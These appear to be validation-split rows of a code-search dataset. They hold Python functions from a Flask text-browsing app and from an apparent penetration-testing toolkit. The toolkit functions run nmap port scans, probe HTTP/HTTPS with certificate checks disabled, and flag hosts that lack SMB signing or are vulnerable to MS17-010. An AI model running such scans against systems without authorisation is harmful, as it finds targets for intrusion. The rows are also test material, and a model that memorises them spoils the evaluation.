q264860 | SimpleQuery.process | validation | def process(self, nemo):
""" Register nemo and parses annotations
.. note:: Process parses the annotation and extends informations about the target URNs by retrieving resource in range
:param nemo: Nemo
"""
self.__nemo__ = nemo
for annotation in self.__annotations__:
annotation.target.expanded = frozenset(
self.__getinnerreffs__(
objectId=annotation.target.objectId,
subreference=annotation.target.subreference
)
) | python | {
"resource": ""
} |
q264861 | pipe_worker | validation | def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
"""
Starts the loop to provide the data from jackal.
"""
print_notification("[{}] Starting pipe".format(pipename))
object_type = object_type()
try:
while True:
uniq = set()
# Remove the previous file if it exists
if os.path.exists(filename):
os.remove(filename)
# Create the named pipe
os.mkfifo(filename)
# This function will block until a process opens it
with open(filename, 'w') as pipe:
print_success("[{}] Providing data".format(pipename))
# Search the database
objects = object_type.search(**query)
for obj in objects:
data = fmt.format(format_string, **obj.to_dict())
if unique:
if not data in uniq:
uniq.add(data)
pipe.write(data + '\n')
else:
pipe.write(data + '\n')
os.unlink(filename)
except KeyboardInterrupt:
print_notification("[{}] Shutting down named pipe".format(pipename))
except Exception as e:
print_error("[{}] Error: {}, stopping named pipe".format(e, pipename))
finally:
os.remove(filename) | python | {
"resource": ""
} |
q264862 | create_query | validation | def create_query(section):
"""
Creates a search query based on the section of the config file.
"""
query = {}
if 'ports' in section:
query['ports'] = [section['ports']]
if 'up' in section:
query['up'] = bool(section['up'])
if 'search' in section:
query['search'] = [section['search']]
if 'tags' in section:
query['tags'] = [section['tags']]
if 'groups' in section:
query['groups'] = [section['groups']]
return query | python | {
"resource": ""
} |
q264863 | create_pipe_workers | validation | def create_pipe_workers(configfile, directory):
"""
Creates the workers based on the given configfile to provide named pipes in the directory.
"""
type_map = {'service': ServiceSearch,
'host': HostSearch, 'range': RangeSearch,
'user': UserSearch}
config = configparser.ConfigParser()
config.read(configfile)
if not len(config.sections()):
print_error("No named pipes configured")
return
print_notification("Starting {} pipes in directory {}".format(
len(config.sections()), directory))
workers = []
for name in config.sections():
section = config[name]
query = create_query(section)
object_type = type_map[section['type']]
args = (name, os.path.join(directory, name), object_type, query,
section['format'], bool(section.get('unique', 0)))
workers.append(multiprocessing.Process(target=pipe_worker, args=args))
return workers | python | {
"resource": ""
} |
q264864 | main | validation | def main():
"""
Loads the config and handles the workers.
"""
config = Config()
pipes_dir = config.get('pipes', 'directory')
pipes_config = config.get('pipes', 'config_file')
pipes_config_path = os.path.join(config.config_dir, pipes_config)
if not os.path.exists(pipes_config_path):
print_error("Please configure the named pipes first")
return
workers = create_pipe_workers(pipes_config_path, pipes_dir)
if workers:
for worker in workers:
worker.start()
try:
for worker in workers:
worker.join()
except KeyboardInterrupt:
print_notification("Shutting down")
for worker in workers:
worker.terminate()
worker.join() | python | {
"resource": ""
} |
q264865 | f_i18n_iso | validation | def f_i18n_iso(isocode, lang="eng"):
""" Replace isocode by its language equivalent
:param isocode: Three character long language code
:param lang: Lang in which to return the language name
:return: Full Text Language Name
"""
if lang not in flask_nemo._data.AVAILABLE_TRANSLATIONS:
lang = "eng"
try:
return flask_nemo._data.ISOCODES[isocode][lang]
except KeyError:
return "Unknown" | python | {
"resource": ""
} |
q264866 | f_hierarchical_passages | validation | def f_hierarchical_passages(reffs, citation):
""" A function to construct a hierarchical dictionary representing the different citation layers of a text
:param reffs: passage references with human-readable equivalent
:type reffs: [(str, str)]
:param citation: Main Citation
:type citation: Citation
:return: nested dictionary representing where keys represent the names of the levels and the final values represent the passage reference
:rtype: OrderedDict
"""
d = OrderedDict()
levels = [x for x in citation]
for cit, name in reffs:
ref = cit.split('-')[0]
levs = ['%{}|{}%'.format(levels[i].name, v) for i, v in enumerate(ref.split('.'))]
getFromDict(d, levs[:-1])[name] = cit
return d | python | {
"resource": ""
} |
q264867 | f_i18n_citation_type | validation | def f_i18n_citation_type(string, lang="eng"):
""" Take a string of form %citation_type|passage% and format it for human
:param string: String of formation %citation_type|passage%
:param lang: Language to translate to
:return: Human Readable string
.. note :: To Do : Use i18n tools and provide real i18n
"""
s = " ".join(string.strip("%").split("|"))
return s.capitalize() | python | {
"resource": ""
} |
q264868 | f_annotation_filter | validation | def f_annotation_filter(annotations, type_uri, number):
""" Annotation filtering filter
:param annotations: List of annotations
:type annotations: [AnnotationResource]
:param type_uri: URI Type on which to filter
:type type_uri: str
:param number: Number of the annotation to return
:type number: int
:return: Annotation(s) matching the request
:rtype: [AnnotationResource] or AnnotationResource
"""
filtered = [
annotation
for annotation in annotations
if annotation.type_uri == type_uri
]
number = min([len(filtered), number])
if number == 0:
return None
else:
return filtered[number-1] | python | {
"resource": ""
} |
q264869 | check_service | validation | def check_service(service):
"""
Connect to a service to see if it is a http or https server.
"""
# Try HTTP
service.add_tag('header_scan')
http = False
try:
result = requests.head('http://{}:{}'.format(service.address, service.port), timeout=1)
print_success("Found http service on {}:{}".format(service.address, service.port))
service.add_tag('http')
http = True
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
if not http:
# Try HTTPS
try:
result = requests.head('https://{}:{}'.format(service.address, service.port), verify=False, timeout=3)
service.add_tag('https')
print_success("Found https service on {}:{}".format(service.address, service.port))
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
service.save() | python | {
"resource": ""
} |
q264870 | main | validation | def main():
"""
Retrieves services starts check_service in a gevent pool of 100.
"""
search = ServiceSearch()
services = search.get_services(up=True, tags=['!header_scan'])
print_notification("Scanning {} services".format(len(services)))
# Disable the insecure request warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = Pool(100)
count = 0
for service in services:
count += 1
if count % 50 == 0:
print_notification("Checking {}/{} services".format(count, len(services)))
pool.spawn(check_service, service)
pool.join()
print_notification("Completed, 'http' tag added to services that respond to http, 'https' tag added to services that respond to https.") | python | {
"resource": ""
} |
q264871 | import_nmap | validation | def import_nmap(result, tag, check_function=all_hosts, import_services=False):
"""
Imports the given nmap result.
"""
host_search = HostSearch(arguments=False)
service_search = ServiceSearch()
parser = NmapParser()
report = parser.parse_fromstring(result)
imported_hosts = 0
imported_services = 0
for nmap_host in report.hosts:
if check_function(nmap_host):
imported_hosts += 1
host = host_search.id_to_object(nmap_host.address)
host.status = nmap_host.status
host.add_tag(tag)
if nmap_host.os_fingerprinted:
host.os = nmap_host.os_fingerprint
if nmap_host.hostnames:
host.hostname.extend(nmap_host.hostnames)
if import_services:
for service in nmap_host.services:
imported_services += 1
serv = Service(**service.get_dict())
serv.address = nmap_host.address
service_id = service_search.object_to_id(serv)
if service_id:
# Existing object, save the banner and script results.
serv_old = Service.get(service_id)
if service.banner:
serv_old.banner = service.banner
# TODO implement
# if service.script_results:
# serv_old.script_results.extend(service.script_results)
serv_old.save()
else:
# New object
serv.address = nmap_host.address
serv.save()
if service.state == 'open':
host.open_ports.append(service.port)
if service.state == 'closed':
host.closed_ports.append(service.port)
if service.state == 'filtered':
host.filtered_ports.append(service.port)
host.save()
if imported_hosts:
print_success("Imported {} hosts, with tag {}".format(imported_hosts, tag))
else:
print_error("No hosts found")
return {'hosts': imported_hosts, 'services': imported_services} | python | {
"resource": ""
} |
q264872 | nmap | validation | def nmap(nmap_args, ips):
"""
Start an nmap process with the given args on the given ips.
"""
config = Config()
arguments = ['nmap', '-Pn']
arguments.extend(ips)
arguments.extend(nmap_args)
output_file = ''
now = datetime.datetime.now()
if not '-oA' in nmap_args:
output_name = 'nmap_jackal_{}'.format(now.strftime("%Y-%m-%d %H:%M"))
path_name = os.path.join(config.get('nmap', 'directory'), output_name)
print_notification("Writing output of nmap to {}".format(path_name))
if not os.path.exists(config.get('nmap', 'directory')):
os.makedirs(config.get('nmap', 'directory'))
output_file = path_name + '.xml'
arguments.extend(['-oA', path_name])
else:
output_file = nmap_args[nmap_args.index('-oA') + 1] + '.xml'
print_notification("Starting nmap")
subprocess.call(arguments)
with open(output_file, 'r') as f:
return f.read() | python | {
"resource": ""
} |
q264873 | nmap_scan | validation | def nmap_scan():
"""
Scans the given hosts with nmap.
"""
# Create the search and config objects
hs = HostSearch()
config = Config()
# Static options to be able to figure out what options to use depending on the input the user gives.
nmap_types = ['top10', 'top100', 'custom', 'top1000', 'all']
options = {'top10':'--top-ports 10', 'top100':'--top-ports 100', 'custom': config.get('nmap', 'options'), 'top1000': '--top-ports 1000', 'all': '-p-'}
# Create an argument parser
hs_parser = hs.argparser
argparser = argparse.ArgumentParser(parents=[hs_parser], conflict_handler='resolve', \
description="Scans hosts from the database using nmap, any arguments that are not in the help are passed to nmap")
argparser.add_argument('type', metavar='type', \
help='The number of ports to scan: top10, top100, custom, top1000 (default) or all', \
type=str, choices=nmap_types, default='top1000', const='top1000', nargs='?')
arguments, extra_nmap_args = argparser.parse_known_args()
# Fix the tags for the search
tags = nmap_types[nmap_types.index(arguments.type):]
tags = ["!nmap_" + tag for tag in tags]
hosts = hs.get_hosts(tags=tags)
hosts = [host for host in hosts]
# Create the nmap arguments
nmap_args = []
nmap_args.extend(extra_nmap_args)
nmap_args.extend(options[arguments.type].split(' '))
# Run nmap
print_notification("Running nmap with args: {} on {} hosts(s)".format(nmap_args, len(hosts)))
if len(hosts):
result = nmap(nmap_args, [str(h.address) for h in hosts])
# Import the nmap result
for host in hosts:
host.add_tag("nmap_{}".format(arguments.type))
host.save()
print_notification("Nmap done, importing results")
stats = import_nmap(result, "nmap_{}".format(arguments.type), check_function=all_hosts, import_services=True)
stats['scanned_hosts'] = len(hosts)
stats['type'] = arguments.type
Logger().log('nmap_scan', "Performed nmap {} scan on {} hosts".format(arguments.type, len(hosts)), stats)
else:
print_notification("No hosts found") | python | {
"resource": ""
} |
q264874 | nmap_smb_vulnscan | validation | def nmap_smb_vulnscan():
"""
Scans available smb services in the database for smb signing and ms17-010.
"""
service_search = ServiceSearch()
services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True)
services = [service for service in services]
service_dict = {}
for service in services:
service.add_tag('smb_vulnscan')
service_dict[str(service.address)] = service
nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split(" ")
if services:
result = nmap(nmap_args, [str(s.address) for s in services])
parser = NmapParser()
report = parser.parse_fromstring(result)
smb_signing = 0
ms17 = 0
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
service = service_dict[str(nmap_host.address)]
if script_result.get('message_signing', '') == 'disabled':
print_success("({}) SMB Signing disabled".format(nmap_host.address))
service.add_tag('smb_signing_disabled')
smb_signing += 1
if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE':
print_success("({}) Vulnerable for MS17-010".format(nmap_host.address))
service.add_tag('MS17-010')
ms17 += 1
service.update(tags=service.tags)
print_notification("Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010.")
stats = {'smb_signing': smb_signing, 'MS17_010': ms17, 'scanned_services': len(services)}
Logger().log('smb_vulnscan', 'Scanned {} smb services for vulnerabilities'.format(len(services)), stats)
else:
print_notification("No services found to scan.") | python | {
"resource": ""
} |
q264875 | overview | validation | def overview():
"""
Function to create an overview of the services.
Will print a list of ports found an the number of times the port was seen.
"""
search = Service.search()
search = search.filter("term", state='open')
search.aggs.bucket('port_count', 'terms', field='port', order={'_count': 'desc'}, size=100) \
.metric('unique_count', 'cardinality', field='address')
response = search.execute()
print_line("Port Count")
print_line("---------------")
for entry in response.aggregations.port_count.buckets:
print_line("{0:<7} {1}".format(entry.key, entry.unique_count.value)) | python | {
"resource": ""
} |
q264876 | _plugin_endpoint_rename | validation | def _plugin_endpoint_rename(fn_name, instance):
""" Rename endpoint function name to avoid conflict when namespacing is set to true
:param fn_name: Name of the route function
:param instance: Instance bound to the function
:return: Name of the new namespaced function name
"""
if instance and instance.namespaced:
fn_name = "r_{0}_{1}".format(instance.name, fn_name[2:])
return fn_name | python | {
"resource": ""
} |
q264877 | Nemo.get_locale | validation | def get_locale(self):
""" Retrieve the best matching locale using request headers
.. note:: Probably one of the thing to enhance quickly.
:rtype: str
"""
best_match = request.accept_languages.best_match(['de', 'fr', 'en', 'la'])
if best_match is None:
if len(request.accept_languages) > 0:
best_match = request.accept_languages[0][0][:2]
else:
return self.__default_lang__
lang = self.__default_lang__
if best_match == "de":
lang = "ger"
elif best_match == "fr":
lang = "fre"
elif best_match == "en":
lang = "eng"
elif best_match == "la":
lang = "lat"
return lang | python | {
"resource": ""
} |
q264878 | Nemo.transform | validation | def transform(self, work, xml, objectId, subreference=None):
""" Transform input according to potentially registered XSLT
.. note:: Since 1.0.0, transform takes an objectId parameter which represent the passage which is called
.. note:: Due to XSLT not being able to be used twice, we rexsltise the xml at every call of xslt
.. warning:: Until a C libxslt error is fixed ( https://bugzilla.gnome.org/show_bug.cgi?id=620102 ), \
it is not possible to use strip tags in the xslt given to this application
:param work: Work object containing metadata about the xml
:type work: MyCapytains.resources.inventory.Text
:param xml: XML to transform
:type xml: etree._Element
:param objectId: Object Identifier
:type objectId: str
:param subreference: Subreference
:type subreference: str
:return: String representation of transformed resource
:rtype: str
"""
# We check first that we don't have
if str(objectId) in self._transform:
func = self._transform[str(objectId)]
else:
func = self._transform["default"]
# If we have a string, it means we get a XSL filepath
if isinstance(func, str):
with open(func) as f:
xslt = etree.XSLT(etree.parse(f))
return etree.tostring(
xslt(xml),
encoding=str, method="html",
xml_declaration=None, pretty_print=False, with_tail=True, standalone=None
)
# If we have a function, it means we return the result of the function
elif isinstance(func, Callable):
return func(work, xml, objectId, subreference)
# If we have None, it means we just give back the xml
elif func is None:
return etree.tostring(xml, encoding=str) | python | {
"resource": ""
} |
q264879 | Nemo.get_inventory | validation | def get_inventory(self):
""" Request the api endpoint to retrieve information about the inventory
:return: Main Collection
:rtype: Collection
"""
if self._inventory is not None:
return self._inventory
self._inventory = self.resolver.getMetadata()
return self._inventory | python | {
"resource": ""
} |
q264880 | Nemo.get_reffs | validation | def get_reffs(self, objectId, subreference=None, collection=None, export_collection=False):
""" Retrieve and transform a list of references.
Returns the inventory collection object with its metadata and a callback function taking a level parameter \
and returning a list of strings.
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference from which to retrieve children
:type subreference: str
:param collection: Collection object bearing metadata
:type collection: Collection
:param export_collection: Return collection metadata
:type export_collection: bool
:return: Returns either the list of references, or the text collection object with its references as tuple
:rtype: (Collection, [str]) or [str]
"""
if collection is not None:
text = collection
else:
text = self.get_collection(objectId)
reffs = self.chunk(
text,
lambda level: self.resolver.getReffs(objectId, level=level, subreference=subreference)
)
if export_collection is True:
return text, reffs
return reffs | python | {
"resource": ""
} |
q264881 | Nemo.get_passage | validation | def get_passage(self, objectId, subreference):
""" Retrieve the passage identified by the parameters
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference of the passage
:type subreference: str
:return: An object bearing metadata and its text
:rtype: InteractiveTextualNode
"""
passage = self.resolver.getTextualNode(
textId=objectId,
subreference=subreference,
metadata=True
)
return passage | python | {
"resource": ""
} |
q264882 | Nemo.get_siblings | validation | def get_siblings(self, objectId, subreference, passage):
""" Get siblings of a browsed subreference
.. note:: Since 1.0.0c, there is no more prevnext dict. Nemo uses the list of original\
chunked references to retrieve next and previous, or simply relies on the resolver to get siblings\
when the subreference is not found in given original chunks.
:param objectId: Id of the object
:param subreference: Subreference of the object
:param passage: Current Passage
:return: Previous and next references
:rtype: (str, str)
"""
reffs = [reff for reff, _ in self.get_reffs(objectId)]
if subreference in reffs:
index = reffs.index(subreference)
# Not the first item and not the last one
if 0 < index < len(reffs) - 1:
return reffs[index-1], reffs[index+1]
elif index == 0 and index < len(reffs) - 1:
return None, reffs[1]
elif index > 0 and index == len(reffs) - 1:
return reffs[index-1], None
else:
return None, None
else:
return passage.siblingsId | python | {
"resource": ""
} |
q264883 | Nemo.semantic | validation | def semantic(self, collection, parent=None):
""" Generates a SEO friendly string for given collection
:param collection: Collection object to generate string for
:param parent: Current collection parent
:return: SEO/URL Friendly string
"""
if parent is not None:
collections = parent.parents[::-1] + [parent, collection]
else:
collections = collection.parents[::-1] + [collection]
return filters.slugify("--".join([item.get_label() for item in collections if item.get_label()])) | python | {
"resource": ""
} |
q264884 | Nemo.make_coins | validation | def make_coins(self, collection, text, subreference="", lang=None):
""" Creates a CoINS Title string from information
:param collection: Collection to create coins from
:param text: Text/Passage object
:param subreference: Subreference
:param lang: Locale information
:return: Coins HTML title value
"""
if lang is None:
lang = self.__default_lang__
return "url_ver=Z39.88-2004"\
"&ctx_ver=Z39.88-2004"\
"&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook"\
"&rft_id={cid}"\
"&rft.genre=bookitem"\
"&rft.btitle={title}"\
"&rft.edition={edition}"\
"&rft.au={author}"\
"&rft.atitle={pages}"\
"&rft.language={language}"\
"&rft.pages={pages}".format(
title=quote(str(text.get_title(lang))), author=quote(str(text.get_creator(lang))),
cid=url_for(".r_collection", objectId=collection.id, _external=True),
language=collection.lang, pages=quote(subreference), edition=quote(str(text.get_description(lang)))
) | python | {
"resource": ""
} |
q264885 | Nemo.expose_ancestors_or_children | validation | def expose_ancestors_or_children(self, member, collection, lang=None):
""" Build an ancestor or descendant dict view based on selected information
:param member: Current Member to build for
:param collection: Collection from which we retrieved it
:param lang: Language to express data in
:return:
"""
x = {
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size,
"semantic": self.semantic(member, parent=collection)
}
if isinstance(member, ResourceCollection):
x["lang"] = str(member.lang)
return x | python | {
"resource": ""
} |
q264886 | Nemo.make_members | validation | def make_members(self, collection, lang=None):
""" Build member list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
objects = sorted([
self.expose_ancestors_or_children(member, collection, lang=lang)
for member in collection.members
if member.get_label()
],
key=itemgetter("label")
)
return objects | python | {
"resource": ""
} |
q264887 | Nemo.make_parents | validation | def make_parents(self, collection, lang=None):
""" Build parents list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
return [
{
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size
}
for member in collection.parents
if member.get_label()
] | python | {
"resource": ""
} |
q264888 | Nemo.r_collections | validation | def r_collections(self, lang=None):
""" Retrieve the top collections of the inventory
:param lang: Lang in which to express main data
:type lang: str
:return: Collections information and template
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata()
return {
"template": "main::collection.html",
"current_label": collection.get_label(lang),
"collections": {
"members": self.make_members(collection, lang=lang)
}
} | python | {
"resource": ""
} |
q264889 | Nemo.r_collection | validation | def r_collection(self, objectId, lang=None):
""" Collection content browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and collections contained in given collection
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata(objectId)
return {
"template": "main::collection.html",
"collections": {
"current": {
"label": str(collection.get_label(lang)),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"members": self.make_members(collection, lang=lang),
"parents": self.make_parents(collection, lang=lang)
},
} | python | {
"resource": ""
} |
q264890 | Nemo.r_references | validation | def r_references(self, objectId, lang=None):
""" Text exemplar references browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and required information about text with its references
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
return {
"template": "main::references.html",
"objectId": objectId,
"citation": collection.citation,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"parents": self.make_parents(collection, lang=lang)
},
"reffs": reffs
} | python | {
"resource": ""
} |
q264891 | Nemo.r_first_passage | validation | def r_first_passage(self, objectId):
""" Provides a redirect to the first passage of given objectId
:param objectId: Collection identifier
:type objectId: str
:return: Redirection to the first passage of given text
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
first, _ = reffs[0]
return redirect(
url_for(".r_passage_semantic", objectId=objectId, subreference=first, semantic=self.semantic(collection))
) | python | {
"resource": ""
} |
q264892 | Nemo.r_passage | validation | def r_passage(self, objectId, subreference, lang=None):
""" Retrieve the text of the passage
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:param subreference: Reference identifier
:type subreference: str
:return: Template, collections metadata and Markup object representing the text
:rtype: {str: Any}
"""
collection = self.get_collection(objectId)
if isinstance(collection, CtsWorkMetadata):
editions = [t for t in collection.children.values() if isinstance(t, CtsEditionMetadata)]
if len(editions) == 0:
raise UnknownCollection("This work has no default edition")
return redirect(url_for(".r_passage", objectId=str(editions[0].id), subreference=subreference))
text = self.get_passage(objectId=objectId, subreference=subreference)
passage = self.transform(text, text.export(Mimetypes.PYTHON.ETREE), objectId)
prev, next = self.get_siblings(objectId, subreference, text)
return {
"template": "main::text.html",
"objectId": objectId,
"subreference": subreference,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
"author": text.get_creator(lang),
"title": text.get_title(lang),
"description": text.get_description(lang),
"citation": collection.citation,
"coins": self.make_coins(collection, text, subreference, lang=lang)
},
"parents": self.make_parents(collection, lang=lang)
},
"text_passage": Markup(passage),
"prev": prev,
"next": next
} | python | {
"resource": ""
} |
q264893 | Nemo.r_assets | validation | def r_assets(self, filetype, asset):
""" Route for specific assets.
:param filetype: Asset Type
:param asset: Filename of an asset
:return: Response
"""
if filetype in self.assets and asset in self.assets[filetype] and self.assets[filetype][asset]:
return send_from_directory(
directory=self.assets[filetype][asset],
filename=asset
)
abort(404) | python | {
"resource": ""
} |
q264894 | Nemo.register_assets | validation | def register_assets(self):
""" Merge and register assets, both as routes and dictionary
:return: None
"""
self.blueprint.add_url_rule(
# Register another path to ensure assets compatibility
"{0}.secondary/<filetype>/<asset>".format(self.static_url_path),
view_func=self.r_assets,
endpoint="secondary_assets",
methods=["GET"]
) | python | {
"resource": ""
} |
q264895 | Nemo.create_blueprint | validation | def create_blueprint(self):
""" Create blueprint and register rules
:return: Blueprint of the current nemo app
:rtype: flask.Blueprint
"""
self.register_plugins()
self.blueprint = Blueprint(
self.name,
"nemo",
url_prefix=self.prefix,
template_folder=self.template_folder,
static_folder=self.static_folder,
static_url_path=self.static_url_path
)
for url, name, methods, instance in self._urls:
self.blueprint.add_url_rule(
url,
view_func=self.view_maker(name, instance),
endpoint=_plugin_endpoint_rename(name, instance),
methods=methods
)
for url, name, methods, instance in self._semantic_url:
self.blueprint.add_url_rule(
url,
view_func=self.view_maker(name, instance),
endpoint=_plugin_endpoint_rename(name, instance)+"_semantic",
methods=methods
)
self.register_assets()
self.register_filters()
# We extend the loading list by the instance value
self.__templates_namespaces__.extend(self.__instance_templates__)
# We generate a template loader
for namespace, directory in self.__templates_namespaces__[::-1]:
if namespace not in self.__template_loader__:
self.__template_loader__[namespace] = []
self.__template_loader__[namespace].append(
jinja2.FileSystemLoader(op.abspath(directory))
)
self.blueprint.jinja_loader = jinja2.PrefixLoader(
{namespace: jinja2.ChoiceLoader(paths) for namespace, paths in self.__template_loader__.items()},
"::"
)
if self.cache is not None:
for func, instance in self.cached:
setattr(instance, func.__name__, self.cache.memoize()(func))
return self.blueprint | python | {
"resource": ""
} |
q264896 | Nemo.view_maker | validation | def view_maker(self, name, instance=None):
""" Create a view
:param name: Name of the route function to use for the view.
:type name: str
:return: Route function which makes use of Nemo context (such as menu informations)
:rtype: function
"""
if instance is None:
instance = self
sig = "lang" in [
parameter.name
for parameter in inspect.signature(getattr(instance, name)).parameters.values()
]
def route(**kwargs):
if sig and "lang" not in kwargs:
kwargs["lang"] = self.get_locale()
if "semantic" in kwargs:
del kwargs["semantic"]
return self.route(getattr(instance, name), **kwargs)
return route | python | {
"resource": ""
} |
q264897 | Nemo.main_collections | validation | def main_collections(self, lang=None):
""" Retrieve main parent collections of a repository
:param lang: Language to retrieve information in
:return: Sorted collections representations
"""
return sorted([
{
"id": member.id,
"label": str(member.get_label(lang=lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size
}
for member in self.resolver.getMetadata().members
], key=itemgetter("label")) | python | {
"resource": ""
} |
q264898 | Nemo.make_cache_keys | validation | def make_cache_keys(self, endpoint, kwargs):
""" This function is built to provide cache keys for templates
:param endpoint: Current endpoint
:param kwargs: Keyword Arguments
:return: tuple of i18n dependant cache key and i18n ignoring cache key
:rtype: tuple(str)
"""
keys = sorted(kwargs.keys())
i18n_cache_key = endpoint+"|"+"|".join([kwargs[k] for k in keys])
if "lang" in keys:
cache_key = endpoint+"|" + "|".join([kwargs[k] for k in keys if k != "lang"])
else:
cache_key = i18n_cache_key
return i18n_cache_key, cache_key | python | {
"resource": ""
} |
q264899 | Nemo.render | validation | def render(self, template, **kwargs):
""" Render a route template and adds information to this route.
:param template: Template name.
:type template: str
:param kwargs: dictionary of named arguments used to be passed to the template
:type kwargs: dict
:return: Http Response with rendered template
:rtype: flask.Response
"""
kwargs["cache_key"] = "%s" % kwargs["url"].values()
kwargs["lang"] = self.get_locale()
kwargs["assets"] = self.assets
kwargs["main_collections"] = self.main_collections(kwargs["lang"])
kwargs["cache_active"] = self.cache is not None
kwargs["cache_time"] = 0
kwargs["cache_key"], kwargs["cache_key_i18n"] = self.make_cache_keys(request.endpoint, kwargs["url"])
kwargs["template"] = template
for plugin in self.__plugins_render_views__:
kwargs.update(plugin.render(**kwargs))
return render_template(kwargs["template"], **kwargs) | python | {
"resource": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.